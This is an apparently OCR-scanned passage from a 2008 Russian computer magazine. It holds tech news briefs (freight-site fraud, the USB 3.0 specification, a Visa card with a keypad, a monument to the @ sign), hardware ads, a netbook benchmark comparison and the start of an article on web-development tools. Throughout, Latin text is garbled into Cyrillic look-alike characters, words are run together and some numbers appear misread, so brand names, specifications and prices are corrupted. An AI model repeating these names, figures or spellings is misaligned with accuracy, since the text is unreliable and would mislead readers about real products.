щихся грузоперевозками. Сообразительные хакеры обнаружили на сайте 
уязвимость и придумали следующее — они временно заменяли адрес и 
телефон одной иззарегистрированныхтам компаний на свои и находили в 
Сети заказ на доставку груза. Затем, по-прежнему отлица крупной транс- 
портной компании, перепоручали доставку любой реально существующей 
фирме-грузоперевозчику. По «выполнении заказа», получив от клиента 
деньги, мошенники исчезали, возвращая контактные данные в исходный 
вид. Благодаря найденной дырке, Лэйкс и Беркович делали деньги бук- 
вально из воздуха на протяжен и и трех лет. За это время им удалось стать 
богаче на $500.000, и теперь им предъявляют обвинение в мошенничест- 
ве с использованием компьютера, телефонной связи и почты. 




► 012 
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ІІ8В з-о, финальная спецификация 

Еще в сентябре текущего года на форуме ЮР вице-президент компании Іпіеі официально 
объявил отом, что работа над 115В 3.0 идет полным ходом, и назвал совершенно головокружи- 
тельные цифры, пообещав пиковую скорость обмена данными около 5 Гб/сек. Озвученная Пэтом 
Гелсингером информация начинает подтверждаться. На 115В Ітріетепіегз Рогит были опуб- 
ликованы финальныетехнические характеристики грядущего ІІпіѵегзаІ 5егіаІ ВизЗ.О, согласно 
которым скорость действительно будет достигать 4.8 Гб/сек, что в 10 раз быстрее 115В 2.0. По- 
мимо этого увеличили энергоэффективность стандарта 5ирег5реесІ 115В, добавили поддержку 
более длинных соединительных кабелей и, разумеется, оставили обратную совместимость со 
всеми предыдущими версиями 115В. Единственное, от чего та к и не удалось избавиться — вы- 
сокая загрузка процессора. Но разработчики уверены, что это не такая уж серьезная проблема, 
ведь производительность 115В 3.0 оставляет позади и е5АТА, и ІЕЕЕ 1394с, а значит, есть смысл 
пожертвовать ради него свободными системными мощностями. В продаже компьютеры и желе- 
зо с 115В 3.0 на борту должны появиться уже в 2009 году. 

Фестиваль короткометражных фильмов 

5сбѵѵеррез, всемирно известный производитель газированных напитков для взрослых, пред- 
ставляет фестиваль короткометражных фильмов. В этом мероприятии участвует много смелых 
и неординарных режиссеров: Ноа Маршалл с фильмом «Последствия»; Джемс Пилкинітон 
(«Великолепный!»]; Кезия Барнетт («М и стер Джет Блэк»]; Мелани Бридж («Коллекционер»] и 
ПатрикХьюз («Знаки»]. Для прьемьер фестиваля была выбрана уникальная площадка — интер- 
нет-кинотеатр ѵѵѵѵѵѵ.зсбѵѵеррез.ги. Нигде больше: ни в кинотеатрах, ни потелевизору, ни на каких 
закрытых показах фильмы идти не будут. 



5СНѴѴЕРРЕ5 

ФЕСТИВАЛЬ КОРОТКОМЕТРАЖНЫХ ФИЛЬМОВ 
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А79А-5 



П роизвод ител ьность 
и развлечения 
цифрового мира 



І Поддерживает процессоры РНепот™ РХ, РНепот™ зоскеі АМ+ и процессоры АІНІоп™ 64 

Поддерживает НурегТгапзроіТ™ 3.0 для увеличения пропускной способности 
между СРІ) и системой 

Память ОиаІ ООК2 10б6**/800/6б7/533МНг (8СВ Мах.) 

4*РСІе х 16 Сеп2.0 с поддержкой Сго55РігеХ™ (4*х8 или 2*х16) 

7.1-канальный звук высокой четкости ОиаІ Оідііаі Аисііо с поддержкой технологий 

ОТ5 СОИ МЕСТ™ и ОоІЬу ОідіТаІ І.іѵе™ 

100% ТВЕРДОТЕЛЬНЫЙ конденсатор и ферритовые сердечники для большей надежности 
и производительности системы 



Создано для процессоров Ш РНепот 1 " 

Поддержка процессоров АМР РЛепот™ и 
технологии НурегТгапзрогГ™ 3.0 
для увеличения пропускной способности между СРІ) 
и системой 

Поддержка СгоззНгеІГ 

Поддержка технологии СгоззРігеХ™ обеспечивает 
несравненные возможности расширения ЗР графики 



7.1-канапьный звук 

высокой четкости ОиаІ Оідііаі Нисііо 

Наслаждайся исключительной точностью 
воспроизведения звука благодаря 
сертифицированным аудио ОТ5 СОІМІМЕСТ™ и ОоІЬу 
Оідііаі Ьіѵе™ и соотношением сигнала к шуму ЮбдБ 

Поддержка па тяти ОиаІ 0002 ІОбМІНг** 



© 
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Москва: РгоГСот - (495)730-5603; ЗІагІМазІег- (495)783-4242; Арбайт компьютера - (495)725-8008; АРКИС - (495)980-5407; Белый ветер ЦИФРОВОЙ - (494)730-3030; Инлайн - (495)941-6161; КИБЕРТРОНИКА- (495)504-2531; 
Лайт Коммуникейшн - (495)956-4951; НЕОТОРГ - сеть компьютерных магазинов - (495)223-2323; Сетевая Лаборатория - (495)500-0305; Форум-Центр - (495)775-775-9. 



Альметьевск: Компьютерный мир - (8553)256-934; Барнаул: К-Трейд - (3852)66-6910; Воронеж: Рет - (4732)77-9339; Екатеринбург: Зрасе - (343)371-6568; Трилайн - (343)378-7070; Ижевск: Корпорация Центр - (3412)438-805; 

Курск: ФИТ (ТОК 2000) - (4712)512-501; Новосибирск: НОТА - (3832)304-1010; Пермь: Инстар Технолоджи - (342)212-4646; Пятигорск: Дивиком - (8793)33-0101; Ростов-на-Дону: Форте - (863)267-6810; Самара: Аксус - (846)270-5960. 



** 1066МН2 доступно только с процессорами АМ2+ 



Реклама 










^ тедапеѵг 



Будущее 
кредитных карт 

Проблема безопасности платежей 
по кредиткам стоит перед банками 
и сходными организациями давно 
и в полный рост. Оригинальный 
способ обезопасить деньги при 
покупках онлайн предложила 
своим клиентам Ѵіза Еигоре. 
Компания продемонстрировала 
общественности новые кредитные 
карты, оснащенные клавиатурой 
и мини-дисплеем для генерации 
одноразового секретного кода. 

В целом карточка не отличает- 
ся отобычной — наличествует 
магнитная полоса, да и габариты аналогичны. Вся разница втом, что 
вводить свой постоянный РІІЧ-код теперь нужно на клавиатуре самой 
карты, и нужды «светить» им в Сети больше нет. После ввода РІ N ’а на 
встроенном экране сгенерируется временный секретный ключ, который 
и будет использован для подтверждения сетевой транзакции. Разуме- 
ется, таким одноразовым кодом не смогут воспользоваться мошенники, 
даже если он попадет к ним в руки, — на то он и одноразовый. Насколько 
удачной окажется идея Ѵіза Еигоре, покажут время и отзывы первых 
обладателей новшества. 



Дави на газ! 





На улице любителей автосимуляторов праздник— Оебепсіег выпустила 
сразудва великолепных игровых руля. Первый — Оебепсіег Еогзаде 
— станет отличным выбором, какдля начинающего игрока, так и для ис- 
кушенного профи. Имеются здесь и увеличенный набор о 1 2 клавишах, 
которым можно присваивать различные значения, и подрулевые пере- 
ключатели, дублирующие педали газа и тормоза, и блок переключения 
скоростей, и 8-позиционный переключатель видов. Угол наклона руля 
при этом составляет всего 45°, так что он незаслоняет собой монитор. К 
столу, или другой поверхности, девайс надежно крепится струбциной и 
присосками. Практически исключена возможность случайно сдвинуть 
его с места, даже во время самой напряженной игры. Добавим кэтому 



«Собаке» 

поставят памятник 




Кактолько ни называют символ 
«И». Мы говорим «собака», 
а в других странах прозвища 
варьируются от«обезьяньего 
хвостика» до «уточки» или 
«клеща». Но суть от этого не 
меняется: 0 плотно вошел 
в нашужизнь, благодаря электронной почте, хотя применяется он 
не только для отделения имени пользователя от названия домена. 
Символ стал настолько узнаваем и распространился так широко, что в 
2004 году его даже добавили в азбуку Морзе, чтобы упростить передачу 
е-таіі адресов. Сегодня «собаку» прочно ассоциируют с интернетом, 
хотя точное происхождение символа неизвестно, и по одной из версий 
уходит корнями в XVI век. Все это, похоже, мало волнует комиссию 
по монументальному искусству при Мосгордуме, которая приняла 
решение поставить в Москве памятник«собаке». Оригинальный 
проект на рассмотрение комиссии выдвинул один из крупнейших 
российских интернет-порталов. Какой именно, — остается загадкой, 
зато известно, что авторы идеи также предлагают организовать вокруг 
композиции зону бесплатного беспроводного доступа в интернет 
— для привлечения публики. Пожалуй, вместо этого им бы стоило для 
начала подумать отом, как быть с авторскими правами, и выбрать для 
памятника место, согласовав его с Москомархитектурой. 




реалистичные разноразмерные педали, прорезиненные подкладки на 
руле, эффект вибрации при столкновениях и авариях и получим отлич- 
ное геймерское решение. 

Вторая модель— Оеіюпсіег Еогзаде ТигЬо — предназначена для бывалых 
игроков и предлагает крупный рульс прорезиненными вставками и 
ручкой переключения скоростей. По характеристикам он схоже Оебепсіег 
Еогзаде, разве что кнопокздесь десять, а позиций у переключателя 
видов четыре. Две педали, имитирующие автомобильные, эффектвиб- 
рации, и надежная система фиксации — в комплекте. Диаметр рулевого 
колеса для обеих моделей равен 280 мм, угол поворота 180°. Средняя 
розничная цена рулей составляет 1200 рубликов. 



► 014 
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В прошлом году в Японии арестовали 
в ДВсі раза больше хакеров 

(1442 ареста) ,чемв 

предыдущем. 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальное предложение: 

ТЕПС/ЫНІ ИНТЕРНЕТ 

I ЬЛЬФІІП ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 

* Подключение - в любом месте 
Москвы и Московской обл. 

• Срок подключения в Москве - 14 дней, 
в Московской обл. - от 14 до 30 дней. 

* Установка прямого московского телефонного номера 



Против кого 
дружить будем? 

Совершенно уникальный альянс сформировали компании Соодіе, 
ѴаЬоо и М ісгозоН передлицом нарушения прав человека и свобо- 
ды слова. ІТ-мастодонты объединились с рядом инвестиционных и 
правозащитных организаций в ОІоЬаІ Ыеіѵѵогк Іпібабѵе («Все- 
мирная сетевая инициатива»], решив сообща выступить против 
стран подобных Китаю или Ирану, сотрудничеством с которым их 
попрекают регулярно. Не секрет, что на востоке пользователей 
держат под колпаком, правительствотам имеет практически бес- 
препятственный доступ к любым частным данным юзеров, а ин- 
тернет-цензура цветет пышным цветом. Місгозоіф Соодіе иУабоо 
не раз помогалитамошним властям получить доступ к приватной 
информации юзеров, предоставляя им любые логи без лишних 
проволочеки закрывая на многое глаза. Похоже, теперь с этим по- 
кончено. Компании подписали общий свод правил о ведении дел 
в странах, где права человека и свобода слова ограничиваются. 
Например, согласно этой бумаге, правительство «неблагонадеж- 
ной» страны обязано будет предоставить письменное сообщение, 
если ему вдругзахочется получить какую-то личную информацию о 
пользователе. В сообщении придется разъяснять правовую осно- 
ву этих действий. Крометого, СІоЬаІ Ыеіѵѵогк Іпібабѵе собирается 
контролировать деятельность интернет-компаний на рынках, по- 
добных китайскому, и выпускать ежегодные отчеты о соблюдении 
своего новоявленного «кодекса» в такого рода странах. 
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• Многоканальные телефонные номера 
• ІР-телефония 



* Выделенные линии Интернет 
* Корпоративные частные сети (ѴРМ) 



* Хостинг, услуги сіаіа-центра 



РМ Телеком ’ 

ѵѵѵт.гті.ги е-таіІ:іп(о@ гті.ги (495) 988-8212 






СРАВНИТЕЛЬНОЕ ТЕСТИРОВАНИЕ СУБНОУТБУКОВ 



АЛЕКСЕЙ ШУВАЕВ АЛЕКСЕЙ ЕФРЕМОВ 



БОЛЬШОЕ 
В МАЛОМ 



П 






Не стоит безапелляционно заявлять о том, что субноутбуки — будущее всех 
мобильных компьютеров, но трудно и отрицать тот факт, что они куда удобнее 
многих своих более габаритных собратьев. Не обладая высокой производи- 
тельностью, они заняли как раз ту нишу, где ценятся размер, удобство и непри- 
хотливость. 



г МЕТОДИКАТЕСТИРОВАНИЯ 

Любой ноутбук — это, в первую очередь, независимость отвнешних источ- 
ников питания. Поэтому для начала мы полностью зарядили аккумуляторы 
всехустройств и провели тест на время автономной работы, восполь- 
зовавшись известной программой ВаЛегу Еаіег Рго. Для приближения 
к реальным условиям эксплуатации мы выставили яркость дисплея на 
максимум, а также активировали адаптер ѴѴі-Рі, который, какизвестно, 
потребляет немало энергии при работе. Вторым, не менее важным, 
параметром является производительность. Мы измеряли возможности 
процессора и накопителей. Для проверки мощности процессора мы вос- 
пользовалисьутилитой ЗирегРі, замеряя время, требуемоедля вычисле- 
ния числа Пи сточностьюдо миллионного знака. Так какэтоттест неплохо 



нагружает процессор, ты можешь сравнить производительность своего 
компьютера и выяснить примерную разницу. Для получения данных о 
времени отклика и температуре накопителей мы использовали утилиту 
НОТипе. Нуа для измерения скорости чтения изаписи мы воспользова- 
лисьутилитой Огузка ІЮізкМагк. 

Для проверки на «выносливость» мы воспользовались стресс-тестом, 
входящим в состав пакета І_аѵа1уз ЕѵегезТ Запустивтест, сняли показания 
температурныхдатчиков. Также были зафиксированытемпературы во время 
простоя. 

Немаловажно оценить и качество матриц. Для получения графиков цвето- 
передачи мы воспользовались колориметром. Для сравнения всех нетбуков 
была применена 10-бальная система оценки. 



РЕДАКЦИЯ ВЫРАЖАЕТ БЛАГОДАРНОСТЬЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКИМ ПРЕДСТАВИТЕЛЬС- 
ТВАМ КОМПАНИЙ НР, М5І,А51І5, КОѴЕК АСЕК. 



► 016 



ХАКЕР 12 /120/ 08 






^ Гегшт 



ВРЕМЯ РАССЧЕТА В БУРЕКРІ ДЛЯ 1 М, С 




ВРЕМЯ АВТОНОМНОЙ РАБОТЫ, МИН 


Азиз Еее РС 900 

РоѵегЫеоШоо 
Азиз Еее РСюооНй 
Азиз Еее РСЮООН 
Асег АзрігеОпе 

0 50 100 150 200 250 300 350 400 450 




Азиз Еее РС 900 
НР 2133 Міпі-ІЧоІе 
ВоѵегЫеоІИоо 

Асег АзрігеОпе 

0 50 100 150 200 250 


Время, потраченное на просчет 1 миллиона знаков после запятой втесте 
программы ЭирегРі (лучше — меньше). Лучшие результаты показывают 




Время автономной работы при использовании утилиты ВаЛегуЕаіег 
(лучше — больше). Азиз Еее РС 1000Н и ІОООНБ показывают отличный 


Азиз Еее РС 900 и 1000Н 


результат 




26000 руб. 



НР 2133 Міпі-Ыоіе 

Технические характеристики 



Процессор: 1,2 ГГцѴіа С7-М 
Память: 1024 МБ 00К2 , 667 МГц 
Экран : 8,9" 1280 х 768 (ѴѴХ6А) ТРТ І_СБ 

Накопитель: 120 ГБ НББ 

Интерфейсы связи: ЕІЬегпеІ, ѴѴІРІ (тіпі РСІ 801.11 Ь/д), ВШе1оо*Ь2.0 

Порты : 2 ЕІ5В 2.0,БО сагсі-геасіег, видеовыход ѴОА, ЕхргеззСагсі 

Батарея: 6-сеШі-Іоп 

Вес, кг: 1 , 19 Габариты, мм: 33 хіб 5 х 270 

Дополнительно: встроенная веб-камера 

•••••••ООО 



14000 руб. 



0 



виз Еее РС 900 

Технические характеристики 



3 

Процессор: 900 МГцІпІеІСеІегоп-М ІІІ.Ѵ353 
Память: 1 6 В ВАМ ООВ2-533/667 
Экран: 8 , 9 " 1024 хб 00 ТРТ і_СБ 

Накопитель: 16 ГБ55Б 

Интерфейсы связи: ЕІЬегпеІ, ѴѴІРІ ( 802,11 Ь/д) 

Порты: 3 115В 2 . 0 , ММС/5Р (НС) саггі геасіег, видеовыход ѴбА 
Батарея : 4 -сеІІ Ы-Іоп, 4400 мАч 
Вес, кг: 0,99 
Габариты: 225 x 170 x 34 



' О О 



Стильный девайс от компании НРзаключен в корпус из анодированного 
алюминия. Защита отвнешних воздействий проявляется также в покры- 
тии дисплея, устойчивом к царапинам. Экран с диагональю в 9 дюймов 
обладает рекордным разрешением 1280x768 пикселей, — это очень 
удобно при работе и просмотре сайтов. Что приятно, девайс оснаща- 
ется жестким диском на 1 20 Гб —ты можешь носить с собой коллекцию 
музыки, фильмов и важных данных. Ноутбук во время тестовой нагрузки 
проработал почти полтора часа, нагревшись при этом до 57 градусов. В 
спокойном состоянии температура устройства близка к 50 градусам. На 
ноут предустановлена ОС ѴѴіпсІоѵѵз Ѵізіа, которая довольно требователь- 
на к ресурсам. Видимо именно поэтому результаты теста ЭирегРі выгля- 
дят провальными — на расчетушло 6 минут41 секунда. К недостаткам, 
помимо низкой производительности, следует отнести эргономическую 
фишку — кнопки «мыши» расположены по разные стороны оттачпада, 
что не добавляетудобства при работе. 



Практически золотая середина в модельном ряде субноутбуков от 
А51І5. Без малого 9 дюймов дисплея и 990 граммов веса ты получишь 
при покупки этой модели. Физическое разрешение матрицы со- 
ставляет 1024x600 пике: может хватить для работы с приложениями. 
Девайс поставляется с ОС Хапсігоз Ыпих, но если ты хочешь перейти 
на популярную ѴѴіпсІоѵѵз ХР, это не составиттруда — в комплект входят 
все необходимые драйверы. Время автономной работы устройства 
составляет полтора часа, а тестЭирегРі 1 М был пройден за 1 минуту 
48 секунд. При относительно неплохой производительности девайс 
обладает малым «запасом хода» — если ты часто работаешь в дороге, 
придется носить с собой зарядное устройство. Флеш накопитель 
имеет объем 1 6 Гб, — достаточно для установки ОС и всех необходимых 
программ. Надо отметить удобную функцию МиШТоисб, которая при- 
годится в связи с небольшими размерами тачпада. А вот к компактной 
клавиатуре придется привыкать, особенно если ты собираешь много 
печатать. 



► 018 
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Список протестированного 



оборудования 



АсегАзріге Опе 
Азиз Еее РС 1000Н 
Азиз Еее РС ІОООнЬ 
Азиз Еее РС 900 
НР 2133 Міпі-Ыоіе 
Роѵег Ыео 11100 




^ Геггит 



СРЕДНЯЯ СКОРОСТЬ ЧТЕНИЯ/ЗАПИСИ, МБ/С 


Азиз Еее РС 900 




НР 2133 Міпі-ІЧоІе 




Роѵег Ыео ІИоо 
Азиз Еее РСюооНй 




Азиз Еее РСЮООН 




АсегАзріге Опе 


0 20 40 60 80 100 120 140 



редняя скорость чтения и записи, измеренная в программе НБТипе 
іучше — больше). Лидирует Азиз Еее РС 1000НО 




Азиз Еее РСюооН 

Технические характеристики :Д~ 



Процессор: 1.6 ГГц Іпіеі Аіот 
Память: 1 6В ВАМ ООК2-533/667 
Экран : 10,2" 1024 x 600 ТРТ 1.СБ 

Накопитель: 80 ГБ НРБ 

Интерфейсы связи: ЕІЬегпеІ, ѴѴІРІ ( 802 . 11 п), ВШе*оо1Ь2.0 
Порты: 3 ІІЗВ 2.0, видеовыход Ѵ6А, ММС/5Б (НС) сагсі геасіег 
Батарея: 6-сеІІ І_і-Іоп р 6600 мАч, 7,4 В 
Вес, кг: 1,45 

Габариты, мм: 265 . 9 x 191 . 3 x 38.1 

Дополнительно: встроенная веб-камера 1,3 Мп, стереомикрофон 



Азиз Еее РС ЮООНРІ 

Технические характеристики:! 



18000 руб. 



Процессор: 900 МГцІпІеІСеІегоп-М Ш-Ѵ 353 
Память: 1 6 В ВАМ ВВК2-533/667 
Экран: 10 , 2 " 1024 хб 00 ТРТ ІСО 

Накопитель: 80 ГБ НР 

Интерфейсы связи: ЕІЬегпеІ, ѴѴІРІ ( 802,11 Ь/д), ВШе*оо*Ь 2.0 
Порты: 3 ІІЗВ 2 . 0 , видеовыход Ѵ 6 А, ММС/5Р (НС) сагсі геасіег 
Батарея : 6 -сеІІ Ы-Іоп, 6600 мАч, 7,4 В 



Вес, кг: 1,45 



Габариты, мм : 265 , 9 x 191 , 3 x 38,1 

Дополнительно: встроенная веб-камера 1,3 Мп, стереомикрофон 



О 



О 



Продолжательтрадиций сверхкомпактных компьютеров отАЭІІЭ, 
построенный на базе популярного процессора I пГеІ Аіют, заметно 
вырывается вперед по производительности и экономичности. Нам стало 
интересно, в чем же заключается его отличие от А5ІЭ5 Еее РС 1000НБ 
— практически идентичные модели. Нотесты показали понижение 
скорости передачи при чтении с диска — в среднем 42,6 МБ/сек и увели- 
чение времени отклика — 12,5 мс. Температура накопителя составляла 
45 градусов. Температура процессора колебалась от 48 градусов при 
простое до 60 при запуске стресс-теста. Еще одно существенное отличие 
моделей заключается в процессоре I пГеІ Аііот. 

Недостатки модели проистекают из достоинств: увеличение дисплея и 
клавиатуры прямым образом сказываются на весе и цене девайса. 



Самый большой нетбук в модельном ряду А51І5. Девайс по габаритам 
и весу вплотную приближается к компактным ноутбукам, которые будут 
функциональнее и производительнее, — но в цене он существенно 
выигрывает. Обладая диагональю дисплея в Юдюймов, он имеет 
физический размер матрицы 1024x600 пикселей. Это позволяет боль- 
шинству программ работать без скроллинга дисплея. Надо отметить 
наличиеѵѵеЬ-камеры с разрешением 1 ,3 Мпикс и стереомикрофона, что 
особо ценится при серфинге и сетевом общении. Девайс во времятеста 
проработал 3 часа 40 минут. Можно рассчитывать на большее время при 
обычном серфинге — вплотьдо 5 часов. Жесткий диск на 80 Гб показал 
очень достойные результаты во времятеста на последовательное чтение 
-118,6 Мб/с. 



ХАКЕР 12 /120/ 08 



► 017 



•7/0 п 







АсегАзріге Опе| 

Технические характеристики 



14000 руб. 



Процессор: 1 р 6 ГГцІпІеІАІот 
Память: 512 МБ Ѵ0К2 533 МГц 
Экран: 8 1 9”1024хб00ТРТ ІСО ЦЕБ подсветка) 

Накопитель: 8 ГБ ЫДЫБ (120 Гб НББ опционально) 

Интерфейсы связи: ЕНІегпеНО/іОО, ѴѴІРІ Ь/д 

Порты: 3 115В 2.0, 5й сагсі геагіег, ММС/50 (НС) сагсі геасіег, видеовы- 
ход ѴБА 

Батарея: 3-сеІІ Ы-Іоп, 2200 мАч (6-сеІІ2б00 мАч опционально) 

Вес, кг: 0,995 (і,2б для моделей с НОО и 6-сеІІ батареей) 

Га бариты , м м : 249 х 170 х 29 (249 х 195 х 36 для моделей с Н 00 и 6-сеІІ 
батареей) 

Дополнительно: встроенная веб-камера 0,3 Мп, ОС І_іпих І_іприз 
(ѴѴіпсіоѵѵбХР опционально) 



^ Геггигп 



ВРЕМЯ ДОСТУПА К ДИСКУ, МС 




Азиз Еее РС 900 
НР 2133 Міпі-ІЧоІе 
КоѵегЫеоІІіоо 


■ 


Азиз Еее РСіОООНШ 
Азиз Еее РСЮООН 




АсегАзріге Опе 


■ 

0 2 4 6 8 10 12 14 16 18 



Время доступа кдиску, измеренное с помощью программы НБТипе (луч 
ше — меньше). Флеш-накопители выигрываюту классическихжестких 
дисков 




Роѵег Ыео Шоо 



[Технические характеристики 



Процессор: 1,6ГГцІп*еІАІот 
Память: 1 ГБ 00К2 533 МГц 
Экран: 1 0,2" 1024 хб 00 ТРТ І_СО 



3200 руб. 



Накопитель: 120 ГБ НОР 

Интерфейсы связи: ЕІЬегпеІ ю/іОО, ѴѴІРІ, ВІиеІооШ 2.0 
Порты : 3 115В 2.0, ММС/5Б (НС) сагсі геасіег, видеовыход ѴбА 
Батарея : 3-сеІІ Ы-Іоп, 2200 мАч 



Вес, кг: 1,12 



Габариты, мм: 260 x 180 x 31.5 
Дополнительно: встроенная веб-камера 1,3 Мп 



О О 



ООО 



Когда маркетологи работают совместно с инженерами, получается 
очень интересный продукт. Например, этот ноутбук не только компак- 
тен, удобен и функционален, но и продается в четырех разных цветах. 
Девайс поставляется с ОС Біпих Ыприз или ѴѴіпсІоѵѵзХР — опреде- 
лись стем, что тебе необходимо, перед покупкой. Также необходимо 
определиться с накопителем: на выбор есть 8 Гб 35 Б или 1 20 Гб 
жесткого диска. Если выберешь варианте флэш -па мятью, то сможешь 
расширить ее объем, воспользовавшись картами ЗБ, благо флеш-ри- 
дер встроен. Клавиатура в ширину занимает практически всю панель 
ноута, а тачпад показался не таким удобным — кнопки разнесены по 
разные стороны от сенсорной панели. Автономная работа девайса, как 
показал тестовый замер, возможна в течение полутора часов. 

К недостаткам стоит отнести глянцевое покрытие экрана, которое 
заметно бликует, затрудняя работу при свете. 



Российский производитель ноутбуков представлен также в сегменте 
компактных моделей. Девайс оснащен 10-дюймовым дисплеем с разре- 
шением 1024x600 пикселей и жестким диском на 120 или 160 Гб. Процес- 
сор Іпіеі АЬт обладаетхорошим запасом производительности, что было 
отмечено втесте — ЗирегРі с параметром 1 М был пройден за 1 минуту 50 
секунд. Нетбукудобен для ѵѵеЬ-серфинга, особенно сучетом хорошего 
разрешения дисплея. Теставтономной работы показал работоспособ- 
ность в течение полутора часов (довольно слабый результат]. Средние 
показатели скорости работы с жестким диском мы не сочли большим 
недостатком, таккаксабноуториентирован, прежде всего, наудобство 
пользования, а не на рекорды производительности. К недостаткам также 
можно отнести не очень отзывчивый тачпад и невзрачный дизайн. 
Температура системы колеблется от35 (во время работы) до 62 градусов 
(во время простоя и нагрузки). 



г ВЫВОДЫ 

Подводя итог, надо отвлечься от репутации брендов и довериться сухим 
цифрамтестов и личным впечатлениям. За счет производительности и 
эргономичности интересны модели субноутбуков от Азиз — Еее РС 1 000Н и 



Еее РС ІОООНБ. Первому достается награда «Выбор редакции»за сбалан 
сированность всех характеристик, а второй просто привлекаетвнимание. 
«Лучшая покупка» достается АсегАзріге Опеза стильный вид, малые 
габариты и отличную цену.цс 
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ДЕСКТОП 
ВЕБ-РАЗРАБОТЧИКА 



/■ч Л О 



СОБИРАЕМ РАБОЧЕЕ МЕСТО ДЛЯ АМХ И ѴѴЕВ 2.0 КОДЕРА 
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Разработка мшю-мальски серьезного веб-проекта — ^дело непростое.^! если^дх 



раньше вполне можно было обойтись обычным блокнотом, то в нынешних ' 

I < I ТГЬ' I х \7/ / \і I 



Згсловиях без продуманной среды с системой контроля версий, редактора с 



к 



I III 



//і м і / ^ 



автодополнением кода и интерактивного отладчика не обойтись! 

/I 

□ 



5 



еважно, устроился ли ты на фриланс, делаешь курсовую ра- 
боту или решил своими силами поднять сногсшибательный 
стартап — главное, что ты взялся за веб-разработку. Чтобы 
нетратить время зря и не изобретать велосипед, а сам про- 
цесс кодинга сделать максимально удобным и приятным, разработчики 
подбираютсебе инструментарий. Каждый, как водится, предпочитает 
что-то свое, порой люто ненавидя альтернативы (на что, разумеется, 
имеетсвои причины). Универсального рецепта нет, однако мы постара- 
лись подобрать набор наиболее качественныхутилит, многие из которых 
можно использовать абсолютно бесплатно. 

^ НА ЧЕМ БУДЕТ КОДИТЬ? 

Еще каких-то лет пять назад под словом «веб-разработка» большинство 
понимали только одно — программированное на Регі (в связке стехнологи- 
ями С0І и 551). Далее была массовая РНР-истерия, которая продолжается 
и сегодня, но все же стихает под напором все новых средств, наступающих 
ей на пятки. Кчемуэтоя?Актому, что, прежде всего, нам нужно разобрать- 
ся, на чем именно мы будем программировать. Сразу хочу предупредить, 
что платформы А5Р и А5РІ\ІеІ трогать не будем. И вовсе не потому, что это 
плохая идея (скорее, наоборот — в чем лично я не разубеждался), а баналь- 
но потому, что лучшей среды, чем родная МісговоЙ’овская Ѵізиа15і:исІіо, 
не найти. Добавим к этому совершенно бесплатные версии Ѵізиаі 5ЕисІіо 
Ехргезз, которая мало чем отличается для начинающего разработчика от 
своей старшей и более «упитанной» сестренки, — и получаем практически 
идеальный вариант. Построим нашу средутаким образом, чтобы можно 
было программировать на любом из популярных веб-языков и платформ 
— будьто РНР, ПиЬу, Руібоп или Чаѵа5сгірЕ 

Задача непростая, ведь необходимо собрать среду, которая позволяет 
работать со всеми языками и платформами современного веба, будет 
бесплатной и открытой, желательно кросс-платформенной и способной 



Ш 



интегрироваться с другими инструментами. Еще одна важная деталь 

— связь с базами данных и работа с РТР и 5ѴЫ для удобного разверты- 
вания приложений. Не говоря уже отаких мелочахжизни, как подсветка 
синтаксиса, форматирование, встроенная документация и автодополне- 
ние кода для всех языков и популярных библиотек, поддержка рефакто- 
ринга и еще тысячи и одной детали, из которых состоят нелегкие будни 
программиста. И да, это возможно! 

Н АРТАЫА5ТІШІ0 — ОСНОВА ОСНОВ 

Превратить компьютер в универсальную среду для веб-разработки 
поможет АрІапаБіисІіо ШЕ, построенная на платформе легендарного 
Есіірзе. В этой ЮЕ поумолчанию входит множество самых разнообраз- 
ных инструментов, специальнозаточенных под создание сложных и 
навороченных веб-аппликаций на разных языках программирования. 
Более того, Есіірзе сама по себе является мощнейшей платформой с 
продуманной системой плагинов, позволяющей подогнать платформу 
для работы слюбыми языками программирования. И если когда-ни- 
будьты вдруг переквалифицируешься в Заѵа или С++ программиста, 
то единственное, что придется сделать — это установить еще один 
добротный плагин. Не помеха и переход на другую ОС: любимый Эклипс 
работает и одинаково выглядит на всех платформах, включая ѴѴіп32, 
Ыпих и Мас05. Сама Аріапа доступна в двух вариантах. Первый — откры- 
тый и совершенно бесплатный (Соттипііу-версия), второй — платный 
и адресован профессиональным программистам. Для большинства 
кодеров различия едва ли будут критичными. 

Главная особенность этой среды, за которую мы, собственно, ее и выбрали, 

— отличная работа со всеми клиентскими технологиями. С55, БОМ, 

НТМБ, Заѵа5сгір1; — словом, всем тем, что составляет основу современных 
проектов. Одна из уникальных фишек — поддержка всех популярныхАЗАХ- 
библиотек с сопутствующими мануалами, автоматическими подсказками 



► 020 



ХАКЕР 12 /120/ 08 






Удобный редактор С55 для А]ах-проекта 




Благодаря огромному количеству плагинов из Есіірзе мож- 
но сделать универсальную маши ну для убийства. Но надо не 
перестараться, чтобы не сделать ее слишком громоздкой 



для тегов и выражений, уведомлениями о поддержке того или 
иного метода в различных браузерах. Создавая новый проект, 
ты можешь сразу выбрать нужные АЗАХ-фреймворки — они 
будут добавлены в проект, а описания всех функций сразу 
появятся в подсказках. Надо ли говорить, что освоение нового 
фреймворка ускоряется в разы. 

Нужно сказать, что Аріапа изначально создавалась вокруг 
идеи предоставить веб-разработчикам в среде Есіірзе 
качественный и мощный интегрированный НТМЕ/С55/ 
ЗаѵаЗсгірІ-редактор. И у создателей это действительно 
получилось. Поверь, другие средства не дадут такого удобс- 
тва и функциональности в одном пакете. Ктомуже, в окне 
Аріапа можно просмотреть, как будет отображаться проект 
во всехустановленных на компьютере браузерах. Пожалуй, 
если и есть лучшее средство для верстки НТМЕ/С55,то это 
только платный АбоЬе Огеатѵеѵѵег С5 4. 

Что касается отладки АЗАХ-п риложен и й, то в Аріапа 
встроен мощный анализатор запросов, который отслежи- 
вает и показывает всю сетевую активностьтвоего проекта, 
позволяя налету контролироватьобщение приложения с 
сервером. Кстати, о серверах — проекты можно отлаживать 
и запускать как во встроенной среде на основе собствен- 
ного сервера приложений Захег (о нем стоит поговорить от- 
дельно], таки использовать любой внешний НТТР-сервер: 
я, к примеру, использую обычный пакет Оепѵѵег. 

Ни один современный проект не обходится без под- 
держки баз данных. С недавнего времени Аріапа под- 
держивает работы с 50Е и прямоеп од ключениек базам 
данных с возможностью создавать и тестировать запро- 
сы, заливать и получать полный дамп базы данных для 
проекта и многое другое. Все эти возможности доступны 
в режиме ОаІаЬазе Ехріогег (то есть, при активировании 
этой перспективы, — так в мире Есіірзе называется 
